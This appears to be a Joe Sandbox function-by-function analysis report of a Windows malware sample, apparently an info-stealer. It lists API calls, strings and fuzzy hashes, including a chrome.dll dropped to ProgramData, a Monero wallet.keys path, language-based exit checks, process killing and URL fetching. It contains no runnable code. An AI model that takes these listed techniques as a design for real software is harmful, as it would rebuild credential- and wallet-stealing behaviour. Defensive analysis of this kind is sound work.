API String ID: 3073930149-1079375795
Opcode ID: ee1b4ca471849518abd659e2cf30caa7073d7f5d54a38474745178585c3dd50b
Instruction ID: 870084c7f495514a678cf0b5b9cd923077beb923e811a597449a1995cacff43c
Opcode Fuzzy Hash: ee1b4ca471849518abd659e2cf30caa7073d7f5d54a38474745178585c3dd50b
Instruction Fuzzy Hash: 42B11B729502089BDB48FBE0CCA6EEF773AAF54340F40456CF506A61D1EF346A48CB66

Function 00606A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32 ref: 00606A14
ExitProcess.KERNEL32 ref: 00606A45
ExitProcess.KERNEL32 ref: 00606A4F
ExitProcess.KERNEL32 ref: 00606A59
ExitProcess.KERNEL32 ref: 00606A63
ExitProcess.KERNEL32 ref: 00606A6D

Strings

*, xrefs: 00606A2C

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: e53b9997078ff7096ac17da81512c08a44a4a793392e5ca0c001252b44b692c3
Instruction ID: cfe9dc60bc0c4727970838aa3e9a47bbb651f1bb747cbb223815051efb64c8c9
Opcode Fuzzy Hash: e53b9997078ff7096ac17da81512c08a44a4a793392e5ca0c001252b44b692c3
Instruction Fuzzy Hash: F8F08C30A4C209EFD744AFE2EC09B9CBB30FB04707F15419AF60A962D0CA704A90DFA1

Function 006008A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

Part of subcall function 00609850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,006008DC,C:\ProgramData\chrome.dll), ref: 00609871

Part of subcall function 005FA090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 005FA098

StrCmpCA.SHLWAPI(00000000,00F48978), ref: 00600922
StrCmpCA.SHLWAPI(00000000,00F489A8), ref: 00600B79
StrCmpCA.SHLWAPI(00000000,00F489F8), ref: 00600A0C

Part of subcall function 0060AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0060AAF6

DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00600C35

Strings

C:\ProgramData\chrome.dll, xrefs: 006008CD
C:\ProgramData\chrome.dll, xrefs: 00600C30

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$CreateDeleteLibraryLoad
String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
API String ID: 585553867-663540502
Opcode ID: 63564a0b44874090e2f19a8648fc023bed156457b0f8bf015694d912f9611246
Instruction ID: 14c01c85e5e8d489d629bb20120790dc9f0e9e385fbc67908888bafb2142426e
Opcode Fuzzy Hash: 63564a0b44874090e2f19a8648fc023bed156457b0f8bf015694d912f9611246
Instruction Fuzzy Hash: 71A144717002089FCB1CEFA4D996EAE7777BF95340F50816DE40A5F392DA309A05CB96

Function 005F9E30 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 163stringsleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00608CF0: GetSystemTime.KERNEL32(00610E1B,00F4EF50,006105B6,?,?,005F13F9,?,0000001A,00610E1B,00000000,?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 00608D16

wsprintfA.USER32 ref: 005F9E7F
lstrcat.KERNEL32(00000000,?), ref: 005F9F03
lstrcat.KERNEL32(00000000,?), ref: 005F9F17
lstrcat.KERNEL32(00000000,006112D8), ref: 005F9F29
lstrcpy.KERNEL32(?,00000000), ref: 005F9F7C
Sleep.KERNEL32(00001388), ref: 005FA013

Part of subcall function 006099A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006099C5
Part of subcall function 006099A0: Process32First.KERNEL32(005FA056,00000128), ref: 006099D9
Part of subcall function 006099A0: Process32Next.KERNEL32(005FA056,00000128), ref: 006099F2
Part of subcall function 006099A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00609A4E
Part of subcall function 006099A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00609A6C
Part of subcall function 006099A0: CloseHandle.KERNEL32(00000000), ref: 00609A79
Part of subcall function 006099A0: CloseHandle.KERNEL32(005FA056), ref: 00609A88

Strings

D, xrefs: 005F9FA4

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
String ID: D
API String ID: 531068710-2746444292
Opcode ID: 65d33280da9a6f87145b4bfa8aabea7c3f06b99590ea565c28361fa54cb377a8
Instruction ID: 36d7f8a59daacbe0cd0e0080ec3fe6c0f0e6ac74711ec170338a7e696505efa8
Opcode Fuzzy Hash: 65d33280da9a6f87145b4bfa8aabea7c3f06b99590ea565c28361fa54cb377a8
Instruction Fuzzy Hash: 465197B19443089BEB24DBA0DC4AFDA7779BF44700F044598B60DAB2C1EB75AB84CF55

Function 0066F9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0066FA1F
___except_validate_context_record.LIBVCRUNTIME ref: 0066FA27
_ValidateLocalCookies.LIBCMT ref: 0066FAB0
__IsNonwritableInCurrentImage.LIBCMT ref: 0066FADB
_ValidateLocalCookies.LIBCMT ref: 0066FB30

Strings

csm, xrefs: 0066FAC5

Memory Dump Source

Source File: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
Instruction ID: c3dc8f2d6b29dc99f0b705f4499a24737fbefca4cbe4f2ccf2e76b1539df1c8d
Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
Instruction Fuzzy Hash: 28418335A00219EBCF10DF68D884ADEBBB6FF49314F14C169E91DAB392D7319905CB91

Function 005F5000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 005F501A
RtlAllocateHeap.NTDLL(00000000), ref: 005F5021
InternetOpenA.WININET(00610DE3,00000000,00000000,00000000,00000000), ref: 005F503A
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 005F5061
InternetReadFile.WININET(?,?,00000400,00000000), ref: 005F5091
InternetCloseHandle.WININET(?), ref: 005F5109
InternetCloseHandle.WININET(?), ref: 005F5116

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: f98313831bce5db8d1fc0301ec6d65b8409332cdd788c1ac295286143cb771c4
Instruction ID: 2d9cb0909435f8e83125aa7a004fca973bcc0ad5c506279271a639f199a2f4a7
Opcode Fuzzy Hash: f98313831bce5db8d1fc0301ec6d65b8409332cdd788c1ac295286143cb771c4
Instruction Fuzzy Hash: AD3119B4A4421CABDB20CF54DC89BDDB7B4BB48304F1085D9F709A7281DB706AC58F98

Function 0060856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 006085B6
wsprintfA.USER32 ref: 006085E9
RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0060860B
RegCloseKey.ADVAPI32(00000000), ref: 0060861C
RegCloseKey.ADVAPI32(00000000), ref: 00608629

Part of subcall function 0060AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0060AAF6

RegQueryValueExA.ADVAPI32(00000000,00F4F110,00000000,000F003F,?,00000400), ref: 0060867C
lstrlen.KERNEL32(?), ref: 00608691
RegQueryValueExA.ADVAPI32(00000000,00F4F230,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00610B3C), ref: 00608729
RegCloseKey.ADVAPI32(00000000), ref: 00608798
RegCloseKey.ADVAPI32(00000000), ref: 006087AA

Strings

%s\%s, xrefs: 006085DD

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 65764a2347d54151755186c46f4a6c1506163936ecdb61bfee9422cbfbba4690
Instruction ID: 31204bbff799daa2fb13cb21715107dba3324805a7e5215e834da3c7664e19dd
Opcode Fuzzy Hash: 65764a2347d54151755186c46f4a6c1506163936ecdb61bfee9422cbfbba4690
Instruction Fuzzy Hash: 80212A71A5021CAFDB24DB54DC85FE9B3B9FB48700F0081D8E649A6280DF71AA85CFE4

Function 006099A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006099C5
Process32First.KERNEL32(005FA056,00000128), ref: 006099D9
Process32Next.KERNEL32(005FA056,00000128), ref: 006099F2
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00609A4E
TerminateProcess.KERNEL32(00000000,00000000), ref: 00609A6C
CloseHandle.KERNEL32(00000000), ref: 00609A79
CloseHandle.KERNEL32(005FA056), ref: 00609A88

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: 44621d3ff45947d8fbe53639e778b1efe3478defd0c4dc5b899a68e859abe175
Instruction ID: 5ccc55c0d0fcb2c63ae3639d6f48cb6e4addc2dcb7d5a2b83a399f91dd075831
Opcode Fuzzy Hash: 44621d3ff45947d8fbe53639e778b1efe3478defd0c4dc5b899a68e859abe175
Instruction Fuzzy Hash: 1F21EA71A44218EFDB25DFA1DC88BDEB7B6BB48300F1441C8E50AA6290D7749E84CF60

Function 00607820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00607834
RtlAllocateHeap.NTDLL(00000000), ref: 0060783B
RegOpenKeyExA.ADVAPI32(80000002,00F3BAE0,00000000,00020119,00000000), ref: 0060786D
RegQueryValueExA.ADVAPI32(00000000,00F4F290,00000000,00000000,?,000000FF), ref: 0060788E
RegCloseKey.ADVAPI32(00000000), ref: 00607898

Strings

Windows 11, xrefs: 0060784D

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: d25b89d9edae256da902574000599b509602c7c3d708240fd463bf4db484baa7
Instruction ID: ee18d928b79f00150cd84e02d934e22c08df1808e0f67899fb14af6588ea85c7
Opcode Fuzzy Hash: d25b89d9edae256da902574000599b509602c7c3d708240fd463bf4db484baa7
Instruction Fuzzy Hash: 2801FF75A48309BBEB04DBE4DD49FAE7779FB48701F1040A9FA05A6290EB70A940CB50

Function 006078B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 006078C4
RtlAllocateHeap.NTDLL(00000000), ref: 006078CB
RegOpenKeyExA.ADVAPI32(80000002,00F3BAE0,00000000,00020119,00607849), ref: 006078EB
RegQueryValueExA.ADVAPI32(00607849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0060790A
RegCloseKey.ADVAPI32(00607849), ref: 00607914

Strings

CurrentBuildNumber, xrefs: 00607901

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: 21477a50004d737588303fb5be3510f1e57777e5ced6fcaeb1d08faf8d3d0005
Instruction ID: 3ac159b8f6e392ef43dfb0402803da05d43113690fc1088258e609b41f948615
Opcode Fuzzy Hash: 21477a50004d737588303fb5be3510f1e57777e5ced6fcaeb1d08faf8d3d0005
Instruction Fuzzy Hash: B901E1B5A44309BFEB00DBD4DC49FAE7778FB44701F104595F615A6281DB706A508B90

Function 00609470 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(>=`,80000000,00000003,00000000,00000003,00000080,00000000,?,00603D3E,?), ref: 0060948C
GetFileSizeEx.KERNEL32(000000FF,>=`), ref: 006094A9
CloseHandle.KERNEL32(000000FF), ref: 006094B7

Strings

>=`, xrefs: 00609488, 0060948B
>=`, xrefs: 006094A1, 006094CD, 006094A4

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
